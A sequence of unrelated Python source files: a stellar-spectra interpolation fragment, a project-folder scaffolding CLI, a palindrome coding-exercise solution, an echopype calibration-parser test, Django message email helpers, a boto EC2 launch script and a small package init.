i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[8:] = ind[0][i]
weights[8:] = np.squeeze(w)
Z[8:] = [Z0] * 4
else:
if (Z_inf > 0.):
ind = np.where(_Z == Z_inf)
i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[:4] = ind[0][i]
weights[:4] = np.squeeze(w)
Z[:4] = [Z_inf] * 4
if (Z_sup > 0.):
ind = np.where(_Z == Z_sup)
i, w = __interp__(T0, g0, _T[ind], _g[ind], dT_max, eps)
index[4:8] = ind[0][i]
weights[4:8] = np.squeeze(w)
Z[4:8] = [Z_sup] * 4
if ((Z_inf > 0.) & (Z_sup > 0.)):
if ( Z_sup - Z_inf ) > 0.:
fz = (Z0 - Z_inf) / ( Z_sup - Z_inf )
weights[:4] *= fz
weights[4:8] *= ( 1. - fz )
else:
weights[:8] *= 0.5
ind = np.where(weights > 0)
return index[ind].astype(int), weights[ind] # / (weights[ind].sum()) #, Z[ind]
def _interp_weights(self, aps, weights=None, **kwargs):
""" returns interpolation nodes and weights
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
node_weights: array
osl grid node indices and interpolation weights
"""
_aps = np.atleast_2d(aps)
if weights is None:
_weights = np.ones(len(_aps), dtype=float)
elif np.ndim(weights) == 0:
_weights = np.ones(len(_aps), dtype=float) * weights
else:
_weights = weights
node_weights = []
for s, current_weight in zip(_aps, _weights):
logT, logg, logZ = s[:3]
Z = 10 ** logZ
current_nodes = np.array(self._osl_interp_weights(self.osl, logT, logg, Z, **kwargs)).T
current_nodes[:, 1] *= current_weight
node_weights.append(current_nodes)
return node_weights
def _evaluate_from_weights(self, r, other):
""" Evaluate the interpolation from interpolation nodes and weights
Basically do a weighted sum on the grid using the interpolation weights
Parameters
----------
node_weights: array
osl grid node indices and interpolation weights
result of interp_weights
other: array
values to interpolate
Returns
-------
interpolated: ndarray (size(node_weights), )
interpolated values
"""
if np.ndim(other) < 2:
values = np.atleast_2d([other]).T
else:
values = np.atleast_2d(other)
interpolated = [(((values[rk[:, 0].astype(int)].T) * rk[:, 1])).sum(1) for rk in r]
return np.squeeze(interpolated)
def interp(self, aps, weights=None, **kwargs):
"""
Interpolate spectra
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
s0: ndarray (len(aps), len(l0))
interpolated spectra
"""
s0 = self.interp_other(aps, self.osl.spectra, weights=weights, **kwargs)
return s0
def interp_other(self, aps, other, weights=None, **kwargs):
""" Interpolate other grid values
Basically do a weighted sum on the grid using the interpolation weights
Parameters
----------
aps: ndarray
(logT, logg, logZ) sequence.
Or appropriately defined similarly to self.osl.get_interpolation_data
weights: ndarray
optional weights of each ap vector to apply during the interpolation
Returns
-------
interpolated: ndarray (size(node_weights), )
interpolated values
"""
r = self._interp_weights(aps, weights, **kwargs)
interpolated = self._evaluate_from_weights(r, other)
return interpolated
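# Illustrative check (an assumption, not part of the original module): exercise
# __interp__ on a tiny synthetic (logT, logg) grid. Because of the relative
# import above, this only runs via `python -m <package>.<module>`. The point
# (3.7, 4.25) sits in the middle of the 2x2 grid, so all four knots are used
# and the returned weights sum to 1.
if __name__ == "__main__":
    T = np.array([3.6, 3.6, 3.8, 3.8])
    g = np.array([4.0, 4.5, 4.0, 4.5])
    idx, w = __interp__(3.7, 4.25, T, g)
    print("indices:", idx)   # up to 4 grid-point indices (-1 means unused)
    print("weights:", w)     # associated interpolation weights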
|
"""EBP
Usage:
ebp use-default <root>
ebp use <name>
ebp show-default
ebp save-default
ebp (-h | --help)
ebp (-v | --version)
Options:
-h --help Show this screen.
-v --version Show version.
"""
import os
import json
import pprint
from collections import OrderedDict
from docopt import docopt
DEFAULT = {
"root": "/home/user/",
"tag": "default",
"structure": {
"lib":{
"package":True,
"contain":{
"core":{
"package":True,
"contain":{}
},
"config":{
"package":True,
"contain":{}
},
"datatools":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"augment":{
"package":True,
"contain":{}
},
"buid":{
"package":True,
"contain":{}
},
"dataclass":{
"package":True,
"contain":{}
},
"evaluate":{
"package":True,
"contain":{}
},
"sampler":{
"package":True,
"contain":{}
}
}
},
"networks":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"auxiliary":{
"package":True,
"contain":{}
},
"build":{
"package":True,
"contain":{}
},
"parts":{
"package":True,
"contain":{}
}
}
},
"loss":{
"package":True,
"contain":{
"abstract":{
"package":True,
"contain":{}
},
"build":{
"package":True,
"contain":{}
},
"functions":{
"package":True,
"contain":{}
}
}
}
}
},
"data":{
"package": False,
"contain": {}
},
"experiments":{
"package": False,
"contain": {
"resnet": {
"contain":{
"coco": {},
"voc":{}
}
},
"Hrnet":{
"contain":{
"coco":{},
"voc":{}
}
}
}
},
"script":{
"package": False,
"contain":{}
}
},
"main_file":True
}
def build_folder(structure, root_path, package):
# print(f'build the folder{structure}')
if not os.path.exists(root_path):
os.makedirs(root_path)
if package:
with open(os.path.join(root_path, '__init__.py'), 'w') as f:
pass
if not structure:
return
for key in structure.keys():
temp = os.path.join(root_path, key)
if 'package' in structure[key]:
package = structure[key]['package']
elif package:
package = package
else:
package = False
if 'contain' in structure[key]:
build_folder(structure[key]['contain'], temp, package)
else:
build_folder(structure[key], temp, package)
def read_structure(json_path):
with open(json_path, 'r') as f:
structure = json.load(f)
structure = OrderedDict(structure)
main_flag = structure['main_file']
return structure['structure'], structure['root'], main_flag
def save_structure(structure):
with open('default_structure.json', 'w') as f:
json.dump(structure, f)
print('Save in default_structure.json')
def use_custom(json_path):
structure, root_path, main_flag = read_structure(json_path)
if main_flag:
with open(os.path.join(root_path, 'main.py'), 'w') as f:
pass
build_folder(structure, root_path, False)
def main():
arguments = docopt(__doc__, version="1.0.3")
if arguments['use-default']:
build_folder(DEFAULT['structure'], arguments['<root>'], False)
if arguments['show-default']:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(DEFAULT)
if arguments['save-default']:
save_structure(DEFAULT)
if arguments['use']:
use_custom(arguments['<name>'])
if __name__ == '__main__':
main()
|
# Palindromes
# Solutions using DP and a plain loop.
# https://swexpertacademy.com/main/code/problem/problemDetail.do?contestProbId=AV14QpAaAAwCFAYi&categoryId=AV14QpAaAAwCFAYi&categoryType=CODE&&&
# Solution using a plain loop
for tc in range(1, 11):
n=int(input())
result=0
lis=[input() for _ in range(8)]
rev_lis=list(map(list, zip(*lis)))
for i in range(8):
for j in range(9-n):
horiz=lis[i][j:j+n]
verti=rev_lis[i][j:j+n]
if horiz==horiz[::-1]:
result+=1
if verti==verti[::-1]:
result+=1
print("#{} {}".format(tc, result))
# Solution using DP
# def reverse(temp):
# lis=[[] for _ in range(8)]
# idx=0
#
# for i in temp:
# for a in i:
# lis[idx].append(a)
# idx+=1
# idx=0
#
# return lis
#
#
# def palindrome(temp):
# result=0
#
# for lis in temp:
# dp=[[0]*(8) for _ in range(8)]
#
# for i in range(8): # every length-1 substring is a palindrome
# dp[i][i]=1
# if n==1:
# result+=1
#
# for i in range(7): # length-2 substrings are palindromes if the two characters match
# if lis[i]==lis[i+1]:
# dp[i][i+1]=1
# if n==2:
# result+=1
#
# for i in range(2,n): # lengths >= 3 are palindromes if the ends match and the inside is one
# for j in range(8-i):
# if lis[j]==lis[j+i] and dp[j+1][j+i-1]==1:
# # shorter lengths were already checked, so build on those results
# dp[j][j+i]=1
# if i==(n-1):
# result+=1
# return result
#
# if __name__=="__main__":
#
# for tc in range(1, 11):
# n=int(input())
# temp=[]
# for _ in range(8):
# temp.append(input())
#
# print("#{} {}".format(tc, palindrome(temp)+palindrome(reverse(temp))))
|
from pathlib import Path
from datetime import datetime
from echopype.calibrate.ecs_parser import ECSParser
data_dir = Path("./echopype/test_data/ecs")
CORRECT_PARSED_PARAMS = {
"fileset": {
"SoundSpeed": 1496.0,
"TvgRangeCorrection": "BySamples",
"TvgRangeCorrectionOffset": 2.0,
},
"sourcecal": {
"T1": {
"AbsorptionCoefficient": 0.002822,
"EK60SaCorrection": -0.7,
"Ek60TransducerGain": 22.95,
"MajorAxis3dbBeamAngle": 10.82,
"MajorAxisAngleOffset": 0.25,
"MajorAxisAngleSensitivity": 13.89,
"MinorAxis3dbBeamAngle": 10.9,
"MinorAxisAngleOffset": -0.18,
"MinorAxisAngleSensitivity": 13.89,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -17.37,
},
"T2": {
"AbsorptionCoefficient": 0.009855,
"EK60SaCorrection": -0.52,
"Ek60TransducerGain": 26.07,
"MajorAxis3dbBeamAngle": 6.85,
"MajorAxisAngleOffset": 0.0,
"MajorAxisAngleSensitivity": 21.970001,
"MinorAxis3dbBeamAngle": 6.81,
"MinorAxisAngleOffset": -0.08,
"MinorAxisAngleSensitivity": 21.970001,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -21.01,
},
"T3": {
"AbsorptionCoefficient": 0.032594,
"EK60SaCorrection": -0.3,
"Ek60TransducerGain": 26.55,
"MajorAxis3dbBeamAngle": 6.52,
"MajorAxisAngleOffset": 0.37,
"MajorAxisAngleSensitivity": 23.12,
"MinorAxis3dbBeamAngle": 6.58,
"MinorAxisAngleOffset": -0.05,
"MinorAxisAngleSensitivity": 23.12,
"SoundSpeed": 1480.6,
"TwoWayBeamAngle": -20.47,
},
},
"localcal": {"MyCal": {"TwoWayBeamAngle": -17.37}},
}
def test_convert_ecs():
# Test converting an EV calibration file (ECS)
ecs_path = data_dir / "Summer2017_JuneCal_3freq_mod.ecs"
ecs = ECSParser(ecs_path)
ecs.parse()
# Spot test parsed outcome
assert ecs.data_type == "SimradEK60Raw"
assert ecs.version == "1.00"
assert ecs.file_creation_time == datetime(
year=2015, month=6, day=19, hour=23, minute=26, second=4
)
assert ecs.parsed_params == CORRECT_PARSED_PARAMS
cal_params = ecs.get_cal_params()
# Test SourceCal overwrite FileSet settings
assert cal_params["T1"]["SoundSpeed"] == 1480.60
# Test overwrite by LocalCal
assert cal_params["T2"]["TwoWayBeamAngle"] == -17.37
|
import re
from django.utils.text import wrap
from django.utils.translation import ugettext, ugettext_lazy as _
from django.contrib.sites.models import Site
from django.template import Context, loader
from django.template.loader import render_to_string
from django.conf import settings
# favour django-mailer but fall back to django.core.mail
if "mailer" in settings.INSTALLED_APPS:
from mailer import send_mail
else:
from django.core.mail import send_mail
def format_quote(sender, body):
"""
Wraps text at 55 chars and prepends each
line with `> `.
Used for quoting messages in replies.
"""
lines = wrap(body, 55).split('\n')
for i, line in enumerate(lines):
lines[i] = "> %s" % line
quote = '\n'.join(lines)
return ugettext(u"%(sender)s wrote:\n%(body)s") % {
'sender': sender,
'body': quote
}
def format_subject(subject):
"""
Prepends 'Re:' to the subject. To avoid multiple 'Re:'s
a counter is added.
NOTE: Currently unused. First step to fix Issue #48.
FIXME: Any hints how to make this i18n aware are very welcome.
"""
subject_prefix_re = r'^Re\[(\d*)\]:\ '
m = re.match(subject_prefix_re, subject, re.U)
prefix = u""
if subject.startswith('Re: '):
prefix = u"[2]"
subject = subject[4:]
elif m is not None:
try:
num = int(m.group(1))
prefix = u"[%d]" % (num + 1)
subject = subject[6 + len(str(num)):]
except:
# if anything fails here, fall back to the old mechanism
pass
return ugettext(u"Re%(prefix)s: %(subject)s") % {
'subject': subject,
'prefix': prefix
}
def new_message_email(sender, instance, signal,
subject_prefix=_(u'New Message: %(subject)s'),
template_name="django_messages/new_message.html",
default_protocol=None,
*args, **kwargs):
"""
This function sends an email and is called via Django's signal framework.
Optional arguments:
``template_name``: the template to use
``subject_prefix``: prefix for the email subject.
``default_protocol``: default protocol in site URL passed to template
"""
if default_protocol is None:
default_protocol = getattr(settings, 'DEFAULT_HTTP_PROTOCOL', 'http')
if 'created' in kwargs and kwargs['created']:
try:
current_domain = Site.objects.get_current().domain
subject = subject_prefix % {'subject': instance.subject}
message = render_to_string(template_name, {
'site_url': '%s://%s' % (default_protocol, current_domain),
'message': instance,
})
if instance.recipient.email != "":
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL,
[instance.recipient.email, ])
except Exception as e:
pass # fail silently
|
#!/usr/bin/env python
"""
http://docs.aws.amazon.com/ElasticLoadBalancing/latest/DeveloperGuide/elb-cloudwatch-metrics.html
"""
import boto.ec2
import os
import sys
import time
AWS_REGION = os.environ['EC2_REGION']
AWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = os.environ['AWS_SECRET_KEY']
def create_instance(ami, instance_type):
tags = {}
tags['Name'] = 'web_production_JAILS'
tags['Salt'] = 'web_production_JAILS'
conn = boto.ec2.connect_to_region(
AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY,
aws_secret_access_key=AWS_SECRET_KEY)
interface = boto.ec2.networkinterface.NetworkInterfaceSpecification(
subnet_id='subnet-f61b5293',
groups=['sg-e77c9683'],
device_index=0,
secondary_private_ip_address_count=3,
associate_public_ip_address=False
)
interfaces = boto.ec2.networkinterface.NetworkInterfaceCollection(
interface)
reservation = conn.run_instances(
ami,
key_name='VPC',
instance_type=instance_type,
network_interfaces=interfaces,
dry_run=False
)
instance = reservation.instances[0]
# Check up on its status every so often
status = instance.update()
while status == 'pending':
time.sleep(10)
status = instance.update()
    if status == 'running':
        instance.add_tags(tags)
    else:
        print('Instance status: ' + status)
    # Return the new instance's id so callers (and the __main__ print below)
    # get something meaningful instead of None.
    return instance.id
if __name__ == "__main__":
# if not sys.argv[2:]:
# print "Enter ELB name"
# sys.exit(1)
ami = 'ami-dddd78ae'
instance_type = 't2.medium'
    print(create_instance(ami, instance_type))
|
from hamlyn2021.data_processing.data_scraping import RandomDownloader, SequenceDownloader
__all__ = [
    "RandomDownloader",
    "SequenceDownloader",
]
|